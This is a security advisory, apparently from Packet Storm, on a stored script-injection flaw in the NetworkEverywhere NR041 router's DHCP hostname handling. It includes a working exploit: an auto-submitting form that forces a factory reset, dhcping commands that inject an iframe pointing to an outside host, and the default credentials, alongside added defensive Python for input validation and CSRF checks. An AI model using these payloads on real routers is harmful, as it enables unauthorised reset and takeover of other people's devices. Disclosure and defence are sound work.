networkEverywhere.txt

26 Aug 2004 | Reported by Mathieu Lacroix | Type: packetstorm | Source: packetstormsecurity.com

NetworkEverywhere NR041 router has a script injection vulnerability via DHCP, allowing factory reset.

NetworkEverywhere router Model NR041 (latest firmware rev 1.2 Release 03)  
suffers a "script injection over dhcp" vulnerability.  
  
  
The NR041 does not filter the DHCP hostname option sent by its clients.  
The value is stored and later rendered in the web-based administrative  
interface, so a client can inject a web script into that page; when the  
administrator consults the DHCP client list, the injected script is executed  
within the open session and therefore with full access to the router. This  
exploit allows a malicious user to reset the box to its factory settings,  
restoring the default credentials, in this case:  
Administrator: none  
Password: admin.  
  
The NR041's DHCP daemon is reachable only from the inside, and the device  
offers no wireless access, so this flaw is not easy to exploit; a successful  
exploitation nevertheless has critical impact.  
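
As an added example (not part of the original advisory, and not the NR041 firmware), the following Python shows the check the router's DHCP daemon is missing: it parses the options area of a DHCP packet, treats the hostname option as untrusted input, accepts only RFC 1123 hostname syntax, and HTML-encodes every cell it renders into the administrative client table. The packet builder, the hostname values, the table layout and the function names are constructed assumptions for illustration.

```python
import html
import re
import struct
from typing import Dict, Optional

DHCP_MAGIC = b"\x63\x82\x53\x63"   # RFC 2132 magic cookie that starts the options area
OPT_PAD, OPT_HOSTNAME, OPT_MSG_TYPE, OPT_END = 0, 12, 53, 255

# One RFC 1123 hostname label: letters, digits and hyphens, 1-63 chars,
# no leading or trailing hyphen. Anything else (quotes, '<', spaces, '/')
# is rejected rather than stored.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def parse_dhcp_options(packet: bytes) -> Dict[int, bytes]:
    """Parse the TLV option area of a BOOTP/DHCP packet into {code: value}."""
    if len(packet) < 240 or packet[236:240] != DHCP_MAGIC:
        raise ValueError("not a DHCP packet: magic cookie missing")
    opts: Dict[int, bytes] = {}
    i = 240
    while i < len(packet):
        code = packet[i]
        if code == OPT_END:
            break
        if code == OPT_PAD:
            i += 1
            continue
        if i + 1 >= len(packet):
            raise ValueError("truncated option header")
        length = packet[i + 1]
        value = packet[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated option value")
        opts[code] = value
        i += 2 + length
    return opts


def validate_hostname(raw: bytes) -> Optional[str]:
    """Return the hostname if it is a syntactically valid RFC 1123 name, else None."""
    try:
        name = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    if not name or len(name) > 253:
        return None
    labels = name.rstrip(".").split(".")
    return name if all(_LABEL.match(label) for label in labels) else None


def render_lease_row(raw_hostname: bytes, ip: str, mac: str) -> str:
    """Build one row of the admin UI's DHCP client table (hypothetical layout)."""
    name = validate_hostname(raw_hostname)
    display = name if name is not None else "(invalid hostname)"
    # Output-encode every cell regardless of validation: the allow-list is the
    # first line of defence, HTML escaping the second.
    cells = (html.escape(display), html.escape(ip), html.escape(mac))
    return "<tr><td>%s</td><td>%s</td><td>%s</td></tr>" % cells


def build_discover(hostname: bytes, mac: bytes) -> bytes:
    """Construct a minimal DHCPDISCOVER carrying a hostname option (sample data, not captured traffic)."""
    header = struct.pack("!BBBB", 1, 1, 6, 0)             # op=BOOTREQUEST, htype=Ethernet, hlen=6, hops=0
    header += struct.pack("!IHH", 0x12345678, 0, 0x8000)  # xid, secs, flags (broadcast bit)
    header += b"\x00" * 16                                # ciaddr, yiaddr, siaddr, giaddr
    header += mac.ljust(16, b"\x00")                      # chaddr (16 bytes)
    header += b"\x00" * 192                               # sname (64) + file (128)
    options = bytes([OPT_MSG_TYPE, 1, 1])                 # DHCP message type 1 = DISCOVER
    options += bytes([OPT_HOSTNAME, len(hostname)]) + hostname
    options += bytes([OPT_END])
    return header + DHCP_MAGIC + options


if __name__ == "__main__":
    # Constructed sample: a normal client and one sending the advisory's iframe fragment.
    for name in (b"laptop-01", b"<iframe id=' "):
        pkt = build_discover(name, b"\xaf\xaf\xaf\xaf\xaf\xad")
        row = render_lease_row(parse_dhcp_options(pkt)[OPT_HOSTNAME],
                               "192.168.1.123", "af:af:af:af:af:ad")
        print(row)
```

Run stand-alone, the script prints one clean table row for the normal client and a row reading "(invalid hostname)" for the injected fragment; had the allow-list been bypassed, the `html.escape` call would still have neutralised the markup.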
  
EXPLOITATION: (using DHCPing available at  
http://c3rb3r.openwall.net/dhcping/):  
  
  
  
As mentioned above, the NR041 is configurable via a web-based administrative  
interface made up of several CGIs invoked with the HTTP POST method.  
It is not easy to write a useful script in 15 characters when the string  
cannot be broken wherever one wishes; the same 'id="' trick used for the  
exploitation of the D-Link 614+ is valuable here.  
  
  
STEP1:  
  
Because there is not enough room to exploit the router in one shot, we  
inject an iframe into the router's page to force the administrator's browser  
to fetch "a.htm" from the malicious web site.  
"a.htm" contains a form which submits itself when loaded.  
First of all, place the following code on the web server under a  
one-character name to save space. This code is installed on the remote  
malicious site and contains the actual attack (a call to passwd.cgi with  
FactoryDefaults enabled).  
Note that the router IP (192.168.1.1) is hard-coded in this script (it  
could be obtained dynamically from the HTTP Referer header), so change it  
according to your configuration.  
  
<html><head>  
<script language="JavaScript">  
<!--  
function SymError()  
{  
return true;  
}  
window.onerror = SymError;  
//-->  
</script>  
<script language="javascript">  
function autopost(){  
}  
</script>  
</head><body onload="javascript:document.xx.submit();">  
<form name=xx method=post action="http://192.168.1.1/passwd.cgi">  
<input type=hidden name=FactoryDefaults value="Enable">  
</form>  
</body></html>  
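
The auto-submitting form above succeeds because passwd.cgi honours any POST carrying FactoryDefaults=Enable, no matter which page sent it. As an added example (not from the advisory, the vendor, or the NR041 firmware), here is a request filter in Python that an embedded web interface could apply to state-changing CGIs: reject requests whose Origin or Referer is not the router's own UI, require a per-session token in the form, and demand re-authentication before a factory reset. The header handling, the form fields csrf_token and current_password, the password-check callback, the constructed session values, and the use of the advisory's placeholder host url.ca as the attacker's origin are all assumptions. The re-authentication step is the part that still matters when a script is injected into the administrator's session: such a script can read the page, and so the token, but it cannot read a password the administrator has to type.

```python
import hashlib
import hmac
from typing import Callable, Mapping, Optional, Tuple

# Origin of the router's own administrative UI (the advisory's hard-coded router IP).
ROUTER_ORIGIN = "http://192.168.1.1"

# Form fields that trigger a destructive operation and must never be honoured
# on a bare POST (hypothetical list; FactoryDefaults is from the advisory).
DESTRUCTIVE_FIELDS = {"FactoryDefaults"}


def issue_csrf_token(session_secret: bytes, session_id: str) -> str:
    """Derive the per-session token the UI embeds as a hidden field in its own forms."""
    return hmac.new(session_secret, session_id.encode("ascii"), hashlib.sha256).hexdigest()


def _same_origin(headers: Mapping[str, str]) -> bool:
    """True only if Origin (or, failing that, Referer) names the router's own UI.

    A missing header is treated as cross-site: an auto-submitted form on a
    remote page carries that page's origin, never the router's.
    """
    source = headers.get("Origin") or headers.get("Referer") or ""
    return source == ROUTER_ORIGIN or source.startswith(ROUTER_ORIGIN + "/")


def is_request_allowed(headers: Mapping[str, str], form: Mapping[str, str],
                       session_secret: bytes, session_id: Optional[str],
                       check_password: Callable[[str], bool]) -> Tuple[bool, str]:
    """Decide whether a state-changing POST such as passwd.cgi may proceed.

    Returns (allowed, reason); the reason is what the router should log.
    """
    if session_id is None:
        return False, "no authenticated session"
    if not _same_origin(headers):
        source = headers.get("Origin") or headers.get("Referer")
        return False, "cross-site request from %r" % (source,)
    expected = issue_csrf_token(session_secret, session_id)
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(expected.encode("utf-8"), supplied.encode("utf-8")):
        return False, "missing or wrong CSRF token"
    # Destructive operations additionally require the current password, which
    # an injected script running in the admin's session cannot obtain.
    destructive = any(form.get(field) == "Enable" for field in DESTRUCTIVE_FIELDS)
    if destructive and not check_password(form.get("current_password", "")):
        return False, "factory reset requires re-authentication"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample values: session secret, session id and the stored admin password.
    secret, sid = b"constructed-session-secret", "session-42"
    password_ok = lambda p: hmac.compare_digest(p.encode(), b"constructed-password")
    token = issue_csrf_token(secret, sid)
    # 1. The advisory's a.htm auto-submit, arriving from the attacker's page.
    print(is_request_allowed({"Origin": "http://url.ca", "Referer": "http://url.ca/a.htm"},
                             {"FactoryDefaults": "Enable"}, secret, sid, password_ok))
    # 2. The same reset issued from the router's own form, token and password present.
    print(is_request_allowed({"Origin": ROUTER_ORIGIN},
                             {"FactoryDefaults": "Enable", "csrf_token": token,
                              "current_password": "constructed-password"},
                             secret, sid, password_ok))
```

The first call is refused as cross-site before the token is even examined; the second passes all three checks. The filter is deliberately strict about a missing Origin and Referer, since a request with neither is indistinguishable from a forged one.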
  
  
  
STEP2:  
  
Inject our script into the router using DHCPing:  
  
dhcping -optleasetime 3600 -opttype discover -optreqip 192.168.1.121 -opthostname "/../a.htm' > " -m af:af:af:af:af:af  
  
dhcping -optleasetime 3600 -opttype discover -optreqip 192.168.1.122 -opthostname "'src='//url.ca/" -m af:af:af:af:af:ae  
  
dhcping -optleasetime 3600 -opttype discover -optreqip 192.168.1.123 -opthostname "<iframe id=' " -m af:af:af:af:af:ad  
  
(Tested with a Mozilla browser)  
  
  
PROBLEM: Unfortunately the space available for the malicious URL is limited,  
which makes all of this a bit tricky, but other means of exploitation may be  
possible.  
  
Have a nice test ;-)  
  
  
VENDOR:  
  
NetworkEverywhere support staff was contacted on August 13th but did not  
reply to my email.  
  
VULNERABLE:  
  
Product Release Date : September 6, 2002  
Current Firmware : Version 1.2 Release 03 (latest)  
Firmware Date : May 5, 2003  
  
  
AUTHOR:  
  
Mathieu Lacroix (Daemonz at videotron.ca)  
Thanks to Gregory Duchemin and DHCPing (available at  
http://c3rb3r.openwall.net/dhcping/)  
